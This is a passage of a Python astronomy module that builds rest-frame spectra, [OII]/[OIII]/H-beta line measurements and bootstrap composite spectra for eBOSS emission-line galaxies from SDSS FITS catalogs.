    # Equivalent-width bin edges, four schemes concatenated back-to-back
    oiiewmin = np.zeros(nbin)
    oiiewmax = np.zeros(nbin)
    oiiewbin = np.zeros(nbin)
    oiiewmin[0:2] = [_EPS, 50.0]
    oiiewmax[0:2] = [50.0, 200.]
    oiiewmin[2:2+3] = [_EPS, 40.0, 70.0]
    oiiewmax[2:2+3] = [40.0, 70.0, 200.]
    oiiewmin[5:5+4] = [_EPS, 30.0, 50.0, 80.0]
    oiiewmax[5:5+4] = [30.0, 50.0, 80.0, 200.]
    oiiewmin[9:9+5] = [_EPS, 25.0, 45.0, 60.0, 90.0]
    oiiewmax[9:9+5] = [25.0, 45.0, 60.0, 90.0, 200.]
    # log10-luminosity bin edges, same four schemes
    oiilummin = np.zeros(nbin)
    oiilummax = np.zeros(nbin)
    oiilumbin = np.zeros(nbin)
    oiilummin[0:2] = [40.0, 41.6]
    oiilummax[0:2] = [41.6, 43.5]
    oiilummin[2:2+3] = [40.0, 41.4, 41.8]
    oiilummax[2:2+3] = [41.4, 41.8, 43.5]
    oiilummin[5:5+4] = [40.0, 41.3, 41.6, 41.9]
    oiilummax[5:5+4] = [41.3, 41.6, 41.9, 43.5]
    oiilummin[9:9+5] = [40.0, 41.2, 41.5, 41.7, 42.0]
    oiilummax[9:9+5] = [41.2, 41.5, 41.7, 42.0, 43.5]
    # Calculate the medians from the (value-added) catalogs
    objs_ori = elg_readin()
    vac_objs = elg_readin(vac=True)
    zindex = (np.where(np.logical_and(np.logical_and(np.logical_and(
        objs_ori['zGOOD']==1, objs_ori['Z']>zmin), objs_ori['Z']<zmax), objs_ori['CLASS']=='GALAXY')))[0]
    oiiew = vac_objs['OIIEW'][zindex]
    logoiilum = np.log10(vac_objs['OIILUM'][zindex])
    for i in np.arange(nbin):
        # FIX: np.nanmedian replaces scipy.stats.nanmedian, which was
        # removed from scipy (>=0.17); behavior is equivalent.
        oiiewbin[i] = np.nanmedian(oiiew[((oiiew>oiiewmin[i]) & (oiiew<oiiewmax[i]))])
        oiilumbin[i] = np.nanmedian(logoiilum[((logoiilum>oiilummin[i]) & (logoiilum<oiilummax[i]))])
    return (oiiewmin, oiiewmax, oiiewbin, oiilummin, oiilummax, oiilumbin)
def elg_filename(vac=False):
    """Full path to the ELG catalog; the value-added ('VAGC_') one if *vac*."""
    basename = 'VAGC_' + _elgfile if vac else _elgfile
    return join(datapath.sdss_path(), 'eBOSS', basename)
def feiimgii_composite_filename(bootstrap=False, binoii=False):
    """Full path to the FeII*/MgII composite file.

    *bootstrap* selects the bootstrap-resampled file, *binoii* the
    [OII]-binned ('OII_'-prefixed) variant.
    """
    fname = _bootstrap_compositefile if bootstrap else _compositefile
    if binoii:
        fname = 'OII_' + fname
    return join(datapath.sdss_path(), 'eBOSS', fname)
def feiimgii_composite_readin(bootstrap=False, binoii=False):
    """Read the composite FITS file and return its first (only) row."""
    path = feiimgii_composite_filename(bootstrap=bootstrap, binoii=binoii)
    data = fitsio.read(path)
    return data[0]
def elg_readin(vac=False):
    """Read the ELG catalog (extension 1).

    With vac=True, read the value-added catalog and return its first row.
    Raises IOError when the file is missing.
    """
    infile = elg_filename(vac=vac)
    if not isfile(infile):
        raise IOError("Can't find file {0}.".format(infile))
    data = fitsio.read(infile, ext=1)
    return data[0] if vac else data
def allinone_rest_filename(band):
    """AllInOne filename for *band* in the SDSS rest frame."""
    return aio.allinone_filename(band, prefix=_allinone_rest_fileprefix)
def allinone_observer_filename(band):
    """AllInOne filename for *band* in the observer frame."""
    return aio.allinone_filename(band, prefix=_allinone_observer_fileprefix)
def rest_allspec(overwrite=False):
    """Load and interpolate *ALL* eBOSS ELG spectra
    on to the same rest-frame wavelength grid

    Reads every object in the ELG catalog, interpolates its spectrum onto
    the master (log-)wavelength grid shifted to the rest frame, and hands
    the (nwave, nobj) flux/ivar arrays to allinone_rest_writeout().
    Returns -1 (without doing any work) if any output file already exists
    and *overwrite* is False.
    """
    path1 = join(datapath.sdss_path(), 'v5_7_6')
    path2 = join(datapath.sdss_path(), 'specDR12')
    # check output files
    bands = _allinone_rest_bands
    for thisband in bands:
        # check outfiles
        outfile = allinone_rest_filename(thisband)
        if isfile(outfile) and not overwrite:
            print("File {0} exists. Use overwrite to overwrite it.".format(outfile))
            return -1
        # print "Will write into these files: {0}".format(outfile)
    # read in the elg catalog
    objs_ori = elg_readin()
    nobj = objs_ori.size
    # make a temporary new catalog
    objs_dtype = [('PLATE', 'i4'),
                  ('MJD', 'i4'),
                  ('FIBER', 'i4'),
                  ('RA', 'f8'),
                  ('DEC', 'f8'),
                  ('Z', 'f8')]
    objs = np.zeros(nobj, dtype=objs_dtype)
    objs['PLATE'] = objs_ori['PLATE_1']
    objs['MJD'] = objs_ori['MJD']
    objs['FIBER'] = objs_ori['FIBERID_1']
    objs['RA'] = objs_ori['PLUG_RA']
    objs['DEC'] = objs_ori['PLUG_DEC']
    objs['Z'] = objs_ori['Z']
    # read in master wavelength grid
    master_wave = (aio.allinone_wave_readin())[0]['WAVE']
    master_loglam = np.log10(master_wave)
    nwave = master_wave.size
    # initialization, nobj second dimension because of NMF traditions
    rest_allflux = np.zeros((nwave, nobj))
    rest_allivar = np.zeros((nwave, nobj))
    #rest_allflux = np.zeros((nwave, 10))
    #rest_allivar = np.zeros((nwave, 10))
    # Progress bar
    # NOTE(review): ProgressBar is not imported in the visible import block;
    # confirm `from progressbar import ProgressBar` (or similar) exists upstream.
    pbar = ProgressBar(maxval=nobj).start()
    #for i in np.arange(10):
    for i in np.arange(nobj):
        # Progress bar
        pbar.update(i)
        tmpz = objs[i]['Z']
        # Wavelength: observer-frame coverage shifted to the rest frame
        wave_pos = np.array([3600./(1.+tmpz), 10400./(1.+tmpz)])
        rest_loc = np.searchsorted(master_wave, wave_pos)
        tmp_loglam = master_loglam[rest_loc[0]:rest_loc[1]]
        # read and interpolate; try the v5_7_6 reduction first,
        # then fall back to specDR12
        try:
            tmp_outflux, tmp_outivar = sdssspec.load_interp_spec(objs[i], tmp_loglam, path1, rest=True)
            rest_allflux[rest_loc[0]:rest_loc[1],i] = tmp_outflux
            rest_allivar[rest_loc[0]:rest_loc[1],i] = tmp_outivar
        except (IndexError, TypeError, NameError, ValueError):
            try:
                tmp_outflux, tmp_outivar = sdssspec.load_interp_spec(objs[i], tmp_loglam, path2, rest=True)
                rest_allflux[rest_loc[0]:rest_loc[1],i] = tmp_outflux
                rest_allivar[rest_loc[0]:rest_loc[1],i] = tmp_outivar
            except (IndexError, TypeError, NameError, ValueError):
                # best effort: leave this object's row at zero and continue
                print("Error reading plate {0} mjd {1} fiber {2}".format(objs[i]['PLATE'], objs[i]['MJD'], objs[i]['FIBER']))
    # output
    #Progress bar
    pbar.finish()
    # write out
    print("Now I am writing everything out...")
    allinone_rest_writeout(objs, master_wave, rest_allflux, rest_allivar, overwrite=overwrite)
def allinone_rest_writeout(objs, wave, flux, ivar, overwrite=False):
    """Write out into an AllInOne file in the rest frame

    For every rest-frame band, selects the objects whose redshift places
    observed coverage inside the band's wavelength window and writes one
    FITS row holding index arrays plus the (nwave, nobj_band) flux/ivar
    sub-arrays.
    """
    # check output files
    bands = _allinone_rest_bands
    for thisband in bands:
        # check outfiles
        outfile = allinone_rest_filename(thisband)
        if isfile(outfile) and not overwrite:
            print("File {0} exists. Use overwrite to overwrite it.".format(outfile))
            # NOTE(review): there is no early return/continue here, so the
            # file is still opened below with clobber=False -- confirm this
            # is the intended behavior.
        # print "Will write into these files: {0}".format(outfile)
        # wavelength range
        wavebase = aio.allinone_wavebase(thisband)
        index_wave = np.searchsorted(wave, wavebase)
        nwave = index_wave[1] - index_wave[0]
        # U R here.
        # objects with redshift in the covered range
        index_obj = (np.where(np.logical_and((objs['Z'] > (_minmaxwave[0]/wave[index_wave[1]]-1.-0.001)), (objs['Z'] <= (_minmaxwave[1]/wave[index_wave[0]]-1.+0.001)))))[0]
        if index_obj.size>0:
            # one record holding all per-band data
            outstr_dtype = [('INDEX_OBJ', 'i4', (index_obj.size,)),
                            ('RA', 'f8', (index_obj.size,)), ('DEC', 'f8', (index_obj.size,)), ('Z', 'f4', (index_obj.size,)),
                            ('INDEX_WAVE', 'i4', (2,)),
                            ('WAVE', 'f4', (nwave, )),
                            ('FLUX', 'f4', (nwave, index_obj.size)),
                            ('IVAR', 'f4', (nwave, index_obj.size))]
            outstr = np.array([(index_obj,
                                objs[index_obj]['RA'], objs[index_obj]['DEC'], objs[index_obj]['Z'],
                                index_wave,
                                wave[index_wave[0]:index_wave[1]],
                                flux[index_wave[0]:index_wave[1], index_obj],
                                ivar[index_wave[0]:index_wave[1], index_obj])],
                              dtype=outstr_dtype)
            fits = fitsio.FITS(outfile, 'rw', clobber=overwrite)
            fits.write(outstr)
            fits.close()
def allinone_rest_readin_band(band):
    """Read the rest-frame AllInOne file for *band*; return its first row."""
    infile = allinone_rest_filename(band)
    if not isfile(infile):
        raise IOError("Can't find {0}".format(infile))
    print("Reading {0}.".format(infile))
    return (fitsio.read(infile))[0]
def rest_allspec_readin():
    """Read the per-band rest-frame AllInOne files back into full
    (nwave, nobj) flux and ivar arrays on the master wavelength grid.

    Returns (master_wave, rest_allflux, rest_allivar); the wavelength grid
    carries the +10 km/s _zcorr correction.
    """
    # read in the elg catalog
    objs_ori = elg_readin()
    nobj = objs_ori.size
    # read in master wavelength grid
    master_wave = (aio.allinone_wave_readin())[0]['WAVE']
    master_loglam = np.log10(master_wave)
    nwave = master_wave.size
    # initialization, nobj second dimension because of NMF traditions
    rest_allflux = np.zeros((nwave, nobj))
    rest_allivar = np.zeros((nwave, nobj))
    # paste each band's sub-arrays into the full grid
    bands = _allinone_rest_bands
    for thisband in bands:
        data = allinone_rest_readin_band(thisband)
        index_wave = data['INDEX_WAVE']
        index_obj = data['INDEX_OBJ']
        rest_allflux[index_wave[0]:index_wave[1], index_obj] = data['FLUX']
        rest_allivar[index_wave[0]:index_wave[1], index_obj] = data['IVAR']
    # apply the 10 km/s redshift correction to the wavelength grid
    master_wave = master_wave*(1.+_zcorr)
    return (master_wave, rest_allflux, rest_allivar)
def make_mask(wave, oii=False, o3=False):
    """Boolean mask selecting wavelengths inside the continuum windows.

    Uses the [OII] windows when oii=True, the [OIII] windows when o3=True,
    otherwise the general continuum windows (_contmask).
    """
    if oii:
        windows = _oiimask
    elif o3:
        windows = _o3mask
    else:
        windows = _contmask
    mask = np.zeros(wave.size, dtype='bool')
    for lo, hi in windows:
        mask |= (wave > lo) & (wave < hi)
    return mask
def calculate_continuum(loglam, flux, ivar, mask, polyorder=2):
    """Polynomial continuum estimate over the masked, well-measured pixels.

    Fits flux vs. log-wavelength (degree *polyorder*) to pixels where
    *mask* is set and ivar > 0, then evaluates the fit over the whole
    grid.  Falls back to a flat continuum of ones when no usable pixel
    exists.
    """
    good = mask & (ivar > 0)
    xfit = loglam[good]
    yfit = flux[good]
    if xfit.size == 0:
        return np.ones(loglam.shape)
    coeffs = np.polyfit(xfit, yfit, polyorder)
    return np.poly1d(coeffs)(loglam)
def calculate_continuum_powerlaw(loglam, flux, ivar, mask, polyorder=2):
    """Continuum fit in log-wavelength space (see calculate_continuum).

    Bug fix: ``polyorder`` was referenced in the body but never defined,
    so every call raised NameError; it is now an explicit keyword argument
    defaulting to 2, matching calculate_continuum.  An empty-selection
    guard was also added for consistency with that sibling.
    """
    good = mask & (ivar > 0)
    x = loglam[good]
    y = flux[good]
    if x.size == 0:
        # no usable pixel: flat continuum, as in calculate_continuum
        return np.ones(loglam.shape)
    z = np.polyfit(x, y, polyorder)
    p = np.poly1d(z)
    cont = p(loglam)
    return cont
def value_add_elg(overwrite=False):
    """Create the value-added ELG catalog ('VAGC_' file).

    For every object, sums the flux in a +/-10 pixel window around
    [OII] 3728.48, [OIII] 5008.24 and Hbeta 4862.64, estimates the local
    continuum from side bands 15-25 pixels away on either side, and
    converts the continuum-subtracted line flux into an equivalent width
    and a luminosity.  Results are written to the vac catalog file.
    Returns -1 if the output exists and *overwrite* is False.
    """
    # Check output file
    outfile = elg_filename(vac=True)
    if isfile(outfile) and not overwrite:
        print("File {0} exists. Set overwrite=True to overwrite it.".format(outfile))
        return -1
    Mpc_cm = 3.08568025E24  # centimeters per Megaparsec
    objs_ori = elg_readin()
    nobj = objs_ori.size
    z = objs_ori['Z']
    (master_wave, rest_allflux, rest_allivar) = rest_allspec_readin()
    # OII luminosity and equivalent width
    oiilum = np.zeros(nobj)
    oiiew = np.zeros(nobj)
    index_oii = np.searchsorted(master_wave, 3728.48)
    dnoiiwave = 10  # half-width of the summation window, in pixels
    # median pixel width (wavelength units) inside the window
    dwave = np.median(master_wave[index_oii-dnoiiwave:index_oii+dnoiiwave]-master_wave[index_oii-dnoiiwave-1:index_oii+dnoiiwave-1])
    print("dwave: {0}".format(dwave))
    # integrated line flux; only pixels with ivar>0 contribute
    oiisum = np.sum(rest_allflux[index_oii-dnoiiwave:index_oii+dnoiiwave, :]*(rest_allivar[index_oii-dnoiiwave:index_oii+dnoiiwave, :]>0), axis=0)*dwave
    print("allfinite: {0}".format(np.count_nonzero(np.isfinite(oiisum))))
    # continuum level from the two side bands
    oii_left = np.sum(rest_allflux[index_oii-25:index_oii-15, :]*(rest_allivar[index_oii-25:index_oii-15, :]>0), axis=0)/(25.-15.)
    oii_right = np.sum(rest_allflux[index_oii+15:index_oii+25, :]*(rest_allivar[index_oii+15:index_oii+25, :]>0), axis=0)/(25.-15.)
    oii_cont = (oii_left+oii_right)/2.
    oiiew = (oiisum-oii_cont*dwave)/oii_cont
    # luminosity: flux * 4*pi*d_L^2 -- presumably d_L in Mpc and flux in
    # 1E-17 erg/s/cm^2 units (hence the Mpc_cm^2 and 1E-17 factors); verify.
    oiilum = (oiisum-oii_cont*dwave)*np.power(cosmo.luminosity_distance(z), 2)*4.*np.pi*np.power(Mpc_cm,2)*1E-17
    # [OIII] 5008: same procedure
    index_oiii = np.searchsorted(master_wave, 5008.24)
    dnoiiiwave = 10
    dwave = np.median(master_wave[index_oiii-dnoiiiwave:index_oiii+dnoiiiwave]-master_wave[index_oiii-dnoiiiwave-1:index_oiii+dnoiiiwave-1])
    print("dwave: {0}".format(dwave))
    oiiisum = np.sum(rest_allflux[index_oiii-dnoiiiwave:index_oiii+dnoiiiwave, :]*(rest_allivar[index_oiii-dnoiiiwave:index_oiii+dnoiiiwave, :]>0), axis=0)*dwave
    print("allfinite: {0}".format(np.count_nonzero(np.isfinite(oiiisum))))
    oiii_left = np.sum(rest_allflux[index_oiii-25:index_oiii-15, :]*(rest_allivar[index_oiii-25:index_oiii-15, :]>0), axis=0)/(25.-15.)
    oiii_right = np.sum(rest_allflux[index_oiii+15:index_oiii+25, :]*(rest_allivar[index_oiii+15:index_oiii+25, :]>0), axis=0)/(25.-15.)
    oiii_cont = (oiii_left+oiii_right)/2.
    oiiiew = (oiiisum-oiii_cont*dwave)/oiii_cont
    oiiilum = (oiiisum-oiii_cont*dwave)*np.power(cosmo.luminosity_distance(z), 2)*4.*np.pi*np.power(Mpc_cm,2)*1E-17
    # Hbeta 4862: same procedure
    index_hbeta = np.searchsorted(master_wave, 4862.64)
    dnhbetawave = 10
    dwave = np.median(master_wave[index_hbeta-dnhbetawave:index_hbeta+dnhbetawave]-master_wave[index_hbeta-dnhbetawave-1:index_hbeta+dnhbetawave-1])
    print("dwave: {0}".format(dwave))
    hbetasum = np.sum(rest_allflux[index_hbeta-dnhbetawave:index_hbeta+dnhbetawave, :]*(rest_allivar[index_hbeta-dnhbetawave:index_hbeta+dnhbetawave, :]>0), axis=0)*dwave
    print("allfinite: {0}".format(np.count_nonzero(np.isfinite(hbetasum))))
    hbeta_left = np.sum(rest_allflux[index_hbeta-25:index_hbeta-15, :]*(rest_allivar[index_hbeta-25:index_hbeta-15, :]>0), axis=0)/(25.-15.)
    hbeta_right = np.sum(rest_allflux[index_hbeta+15:index_hbeta+25, :]*(rest_allivar[index_hbeta+15:index_hbeta+25, :]>0), axis=0)/(25.-15.)
    hbeta_cont = (hbeta_left+hbeta_right)/2.
    hbetaew = (hbetasum-hbeta_cont*dwave)/hbeta_cont
    hbetalum = (hbetasum-hbeta_cont*dwave)*np.power(cosmo.luminosity_distance(z), 2)*4.*np.pi*np.power(Mpc_cm,2)*1E-17
    # single-row output record holding the full per-object arrays
    outstr_dtype = [('Z', 'f4', z.shape),
                    ('OIILUM', 'f8', oiilum.shape),
                    ('OIIEW', 'f8', oiiew.shape),
                    ('OIIILUM', 'f8', oiiilum.shape),
                    ('OIIIEW', 'f8', oiiiew.shape),
                    ('HBETALUM', 'f8', hbetalum.shape),
                    ('HBETAEW', 'f8', hbetaew.shape),
                    ]
    outstr = np.array([(z, oiilum, oiiew, oiiilum, oiiiew, hbetalum, hbetaew)],
                      dtype=outstr_dtype)
    print("Write into file: {0}.".format(outfile))
    fits = fitsio.FITS(outfile, 'rw', clobber=overwrite)
    fits.write(outstr)
    fits.close()
def new_composite_engine(wave, flux, ivar, polyorder=2, oii=False, o3=False, bootstrap=False, nbootstrap=_nbootstrap):
    """All the composites should be made with this engine.

    - mean doesn't work for noisy data yet
    - mask is given by _contmask (or the [OII]/[OIII] masks)

    Each object is normalized by its median flux over the continuum
    windows and divided by a per-object polynomial continuum; the
    composite is the nan-median (and nan-mean) over objects, followed by
    one final continuum renormalization.  With bootstrap=True, arrays of
    shape (nwave, nbootstrap) of resampled composites are returned.

    Parameters
    ----------
    wave : (nwave,) ndarray
    flux, ivar : (nwave, nobj) ndarray
    polyorder : int -- degree of the continuum polynomial
    oii, o3 : bool -- select the [OII]/[OIII] continuum windows
    bootstrap, nbootstrap -- bootstrap resampling controls

    Returns
    -------
    (median_norm_median, mean_norm_median)
    """
    loglam = np.log10(wave)
    nwave = wave.size
    # BUG FIX: '/' yields a float under Python 3 and breaks reshape() below;
    # use integer division for the object count.
    nobj = flux.size // wave.size
    mask = make_mask(wave, oii=oii, o3=o3)
    masksize = np.count_nonzero(mask)
    if masksize <= 10:
        # Previously this fell through and raised UnboundLocalError at the
        # return statement; fail loudly with a meaningful message instead.
        raise ValueError("Too few continuum pixels ({0}) to build a composite.".format(masksize))
    x = loglam[mask]
    # Median normalization (not entirely necessary, but keeps the
    # polynomial fits well conditioned).
    # FIX: np.nanmedian/np.nanmean replace scipy.stats.nanmedian/nanmean,
    # which were removed from scipy (>=0.17).
    obj_median = np.nanmedian(flux[mask, :], axis=0)
    y_median = flux/obj_median.reshape(1, nobj)
    norm_median = np.zeros(y_median.shape)
    for iobj in np.arange(nobj):
        # per-object continuum fit from the *raw* flux
        continuum = calculate_continuum(loglam, flux[:,iobj], ivar[:,iobj], mask, polyorder)
        norm_median[:,iobj] = y_median[:, iobj]/continuum
    # unmeasured pixels must not enter the medians/means below
    norm_median[ivar<=0] = np.nan

    def _renormalize(spec):
        # One final continuum division so the composite is ~1 off-line
        z = np.polyfit(x, spec[mask], polyorder)
        return spec/np.poly1d(z)(loglam)

    if bootstrap:
        # Bootstrapping: resample objects with replacement nbootstrap times
        median_norm_median = np.zeros((nwave, nbootstrap))
        mean_norm_median = np.zeros((nwave, nbootstrap))
        # NOTE(review): ProgressBar is not imported in the visible import
        # block -- confirm the progressbar import exists upstream.
        pbar = ProgressBar(maxval=nbootstrap).start()
        for iboot in np.arange(nbootstrap):
            pbar.update(iboot)
            index_boot = np.random.randint(0, nobj, size=nobj)
            median_norm_median[:, iboot] = _renormalize(np.nanmedian(norm_median[:, index_boot], axis=1))
            mean_norm_median[:, iboot] = _renormalize(np.nanmean(norm_median[:, index_boot], axis=1))
        pbar.finish()
    else:
        # Regular (non-bootstrap) composite
        median_norm_median = _renormalize(np.nanmedian(norm_median, axis=1))
        mean_norm_median = _renormalize(np.nanmean(norm_median, axis=1))
    return (median_norm_median, mean_norm_median)
def new_feiimgii_composite(zmin=_zmin, zmax=_zmax, polyorder=3, bootstrap=False, nbootstrap=_nbootstrap):
    """Build FeII*/MgII composite spectra over 2200-5200 A for good ELGs.

    Selects zGOOD==1 galaxies with zmin<z<zmax and returns the general,
    [OII]-window and [OIII]-window composites (median and mean each) from
    new_composite_engine().
    """
    # Read in
    objs_ori = elg_readin()
    (master_wave, rest_allflux, rest_allivar) = rest_allspec_readin()
    master_loglam = np.log10(master_wave)
    #wave_pos = np.array([2200., 4050.])
    # Extended to 5200 to include [OIII] 5007 -- Guangtun, 06/08/2015
    wave_pos = np.array([2200., 5200.])
    # zmin<z<zmax; zGOOD==1; CLASS='GALAXY'
    zindex = (np.where(np.logical_and(np.logical_and(np.logical_and(
        objs_ori['zGOOD']==1, objs_ori['Z']>zmin), objs_ori['Z']<zmax), objs_ori['CLASS']=='GALAXY')))[0]
    print(zindex.shape)
    # cut the spectra down to the composite wavelength window
    rest_loc = np.searchsorted(master_wave, wave_pos)
    outwave = master_wave[rest_loc[0]:rest_loc[1]]
    outloglam = np.log10(outwave)
    tmpflux = rest_allflux[rest_loc[0]:rest_loc[1],zindex]
    tmpivar = rest_allivar[rest_loc[0]:rest_loc[1],zindex]
    # general continuum windows, then [OII]- and [OIII]-specific windows
    (fluxmedian, fluxmean) = new_composite_engine(outwave, tmpflux, tmpivar, polyorder, bootstrap=bootstrap, nbootstrap=nbootstrap)
    (oiifluxmedian, oiifluxmean) = new_composite_engine(outwave, tmpflux, tmpivar, polyorder=2, oii=True, bootstrap=bootstrap, nbootstrap=nbootstrap)
    (oiiifluxmedian, oiiifluxmean) = new_composite_engine(outwave, tmpflux, tmpivar, polyorder=2, o3=True, bootstrap=bootstrap, nbootstrap=nbootstrap)
    return (outwave, fluxmedian, fluxmean, oiifluxmedian, oiifluxmean, oiiifluxmedian, oiiifluxmean)
def save_feiimgii_composite(bootstrap=False, nbootstrap=_nbootstrap, overwrite=False):
    """Compute the FeII*/MgII composites and save them to the composite
    FITS file.  Returns -1 if the output exists and *overwrite* is False.
    """
    outfile = feiimgii_composite_filename(bootstrap=bootstrap)
    if isfile(outfile) and not overwrite:
        print("File {0} exists. Set overwrite=True to overwrite it.".format(outfile))
        return -1
    (outwave, fluxmedian, fluxmean, oiifluxmedian, oiifluxmean, oiiifluxmedian, oiiifluxmean) = new_feiimgii_composite(bootstrap=bootstrap, nbootstrap=nbootstrap)
    nwave = outwave.size
    # single-row record; array shapes depend on the bootstrap flag
    outstr_dtype = [('WAVE', 'f4', outwave.shape),
                    ('FLUXMEDIAN', 'f4', fluxmedian.shape),
                    ('FLUXMEAN', 'f4', fluxmean.shape),
                    ('OII_FLUXMEDIAN', 'f4', oiifluxmedian.shape),
                    ('OII_FLUXMEAN', 'f4', oiifluxmean.shape),
                    ('OIII_FLUXMEDIAN', 'f4', oiiifluxmedian.shape),
                    ('OIII_FLUXMEAN', 'f4', oiiifluxmean.shape)]
    outstr = np.array([(outwave, fluxmedian, fluxmean, oiifluxmedian, oiifluxmean, oiiifluxmedian, oiiifluxmean)],
                      dtype=outstr_dtype)
    print("Write into file: {0}.".format(outfile))
    fits = fitsio.FITS(outfile, 'rw', clobber=overwrite)
    fits.write(outstr)
    fits.close()
# For OII dependence, let's duplicate these two routines but remember to double check if the original two routines change
def new_feiimgii_composite_binoii(zmin=_zmin, zmax=_zmax, polyorder=3, bootstrap=False, nbootstrap=_nbootstrap):
    """Same as new_feiimgii_composite(), but split into the [OII] EW and
    luminosity bins defined by make_oiiewbins().

    For each of the 14 bins, composites are built for objects selected by
    [OII] EW and, separately, by log10 [OII] luminosity.  Output arrays
    have the bin index as the last axis.
    """
    # Read in
    objs_ori = elg_readin()
    vac_objs = elg_readin(vac=True)
    (master_wave, rest_allflux, rest_allivar) = rest_allspec_readin()
    master_loglam = np.log10(master_wave)
    #wave_pos = np.array([2200., 4050.])
    # Extended to 5200 to include [OIII] 5007 -- Guangtun, 06/08/2015
    wave_pos = np.array([2200., 5200.])
    # zmin<z<zmax; zGOOD==1; CLASS='GALAXY'
    zindex = (np.where(np.logical_and(np.logical_and(np.logical_and(
        objs_ori['zGOOD']==1, objs_ori['Z']>zmin), objs_ori['Z']<zmax), objs_ori['CLASS']=='GALAXY')))[0]
    print(zindex.shape)
    rest_loc = np.searchsorted(master_wave, wave_pos)
    outwave = master_wave[rest_loc[0]:rest_loc[1]]
    outloglam = np.log10(outwave)
    tmpflux = rest_allflux[rest_loc[0]:rest_loc[1],zindex]
    tmpivar = rest_allivar[rest_loc[0]:rest_loc[1],zindex]
    # per-object [OII] measurements for the bin selection
    oiiew = vac_objs['OIIEW'][zindex]
    logoiilum = np.log10(vac_objs['OIILUM'][zindex])
    oiiewmin, oiiewmax, oiiewbin, oiilummin, oiilummax, oiilumbin = make_oiiewbins()
    for i in np.arange(oiiewmin.size):
        # composites for the objects in this EW bin
        ewbin = (np.where(np.logical_and(oiiew>oiiewmin[i], oiiew<oiiewmax[i])))[0]
        oii_tmpflux = tmpflux[:,ewbin]
        oii_tmpivar = tmpivar[:,ewbin]
        (ewtmp_fluxmedian, ewtmp_fluxmean) = new_composite_engine(outwave, oii_tmpflux, oii_tmpivar, polyorder, bootstrap=bootstrap, nbootstrap=nbootstrap)
        (ewtmp_oiifluxmedian, ewtmp_oiifluxmean) = new_composite_engine(outwave, oii_tmpflux, oii_tmpivar, polyorder=2, oii=True, bootstrap=bootstrap, nbootstrap=nbootstrap)
        (ewtmp_oiiifluxmedian, ewtmp_oiiifluxmean) = new_composite_engine(outwave, oii_tmpflux, oii_tmpivar, polyorder=2, o3=True, bootstrap=bootstrap, nbootstrap=nbootstrap)
        # composites for the objects in this luminosity bin
        lumbin = (np.where(np.logical_and(logoiilum>oiilummin[i], logoiilum<oiilummax[i])))[0]
        oii_tmpflux = tmpflux[:,lumbin]
        oii_tmpivar = tmpivar[:,lumbin]
        (lumtmp_fluxmedian, lumtmp_fluxmean) = new_composite_engine(outwave, oii_tmpflux, oii_tmpivar, polyorder, bootstrap=bootstrap, nbootstrap=nbootstrap)
        (lumtmp_oiifluxmedian, lumtmp_oiifluxmean) = new_composite_engine(outwave, oii_tmpflux, oii_tmpivar, polyorder=2, oii=True, bootstrap=bootstrap, nbootstrap=nbootstrap)
        (lumtmp_oiiifluxmedian, lumtmp_oiiifluxmean) = new_composite_engine(outwave, oii_tmpflux, oii_tmpivar, polyorder=2, o3=True, bootstrap=bootstrap, nbootstrap=nbootstrap)
        if (i == 0):
            # allocate the output arrays once the per-bin shape is known;
            # last axis runs over the bins
            outshape = ewtmp_fluxmedian.shape+oiiewmin.shape
            ew_fluxmedian = np.zeros(outshape)
            ew_fluxmean = np.zeros(outshape)
            ew_oiifluxmedian = np.zeros(outshape)
            ew_oiifluxmean = np.zeros(outshape)
            ew_oiiifluxmedian = np.zeros(outshape)
            ew_oiiifluxmean = np.zeros(outshape)
            lum_fluxmedian = np.zeros(outshape)
            lum_fluxmean = np.zeros(outshape)
            lum_oiifluxmedian = np.zeros(outshape)
            lum_oiifluxmean = np.zeros(outshape)
            lum_oiiifluxmedian = np.zeros(outshape)
            lum_oiiifluxmean = np.zeros(outshape)
            print("outshape: {0}".format(ew_fluxmedian.shape))
        # without bootstrap the composites are 1-D, with bootstrap 2-D
        if (not bootstrap):
            ew_fluxmedian[:,i] = ewtmp_fluxmedian
            ew_fluxmean[:,i] = ewtmp_fluxmean
            ew_oiifluxmedian[:,i] = ewtmp_oiifluxmedian
            ew_oiifluxmean[:,i] = ewtmp_oiifluxmean
            ew_oiiifluxmedian[:,i] = ewtmp_oiiifluxmedian
            ew_oiiifluxmean[:,i] = ewtmp_oiiifluxmean
            lum_fluxmedian[:,i] = lumtmp_fluxmedian
            lum_fluxmean[:,i] = lumtmp_fluxmean
            lum_oiifluxmedian[:,i] = lumtmp_oiifluxmedian
            lum_oiifluxmean[:,i] = lumtmp_oiifluxmean
            lum_oiiifluxmedian[:,i] = lumtmp_oiiifluxmedian
            lum_oiiifluxmean[:,i] = lumtmp_oiiifluxmean
        else:
            ew_fluxmedian[:,:,i] = ewtmp_fluxmedian
            ew_fluxmean[:,:,i] = ewtmp_fluxmean
            ew_oiifluxmedian[:,:,i] = ewtmp_oiifluxmedian
            ew_oiifluxmean[:,:,i] = ewtmp_oiifluxmean
            ew_oiiifluxmedian[:,:,i] = ewtmp_oiiifluxmedian
            ew_oiiifluxmean[:,:,i] = ewtmp_oiiifluxmean
            lum_fluxmedian[:,:,i] = lumtmp_fluxmedian
            lum_fluxmean[:,:,i] = lumtmp_fluxmean
            lum_oiifluxmedian[:,:,i] = lumtmp_oiifluxmedian
            lum_oiifluxmean[:,:,i] = lumtmp_oiifluxmean
            lum_oiiifluxmedian[:,:,i] = lumtmp_oiiifluxmedian
            lum_oiiifluxmean[:,:,i] = lumtmp_oiiifluxmean
    return (outwave, ew_fluxmedian, ew_fluxmean, ew_oiifluxmedian, ew_oiifluxmean, ew_oiiifluxmedian, ew_oiiifluxmean,
            lum_fluxmedian,lum_fluxmean,lum_oiifluxmedian,lum_oiifluxmean,lum_oiiifluxmedian,lum_oiiifluxmean)
def save_feiimgii_composite_binoii(bootstrap=False, nbootstrap=_nbootstrap, overwrite=False):
    """Compute the [OII]-binned composites and save them (plus the bin
    definitions) to the 'OII_' composite file.  Returns -1 if the output
    exists and *overwrite* is False.
    """
    outfile = feiimgii_composite_filename(bootstrap=bootstrap, binoii=True)
    if ((isfile(outfile)) and (not overwrite)):
        print("File {0} exists. Set overwrite=True to overwrite it.".format(outfile))
        return -1
    oiiewmin, oiiewmax, oiiewbin, oiilummin, oiilummax, oiilumbin = make_oiiewbins()
    outwave, ew_fluxmedian, ew_fluxmean, ew_oiifluxmedian, ew_oiifluxmean, ew_oiiifluxmedian, ew_oiiifluxmean, \
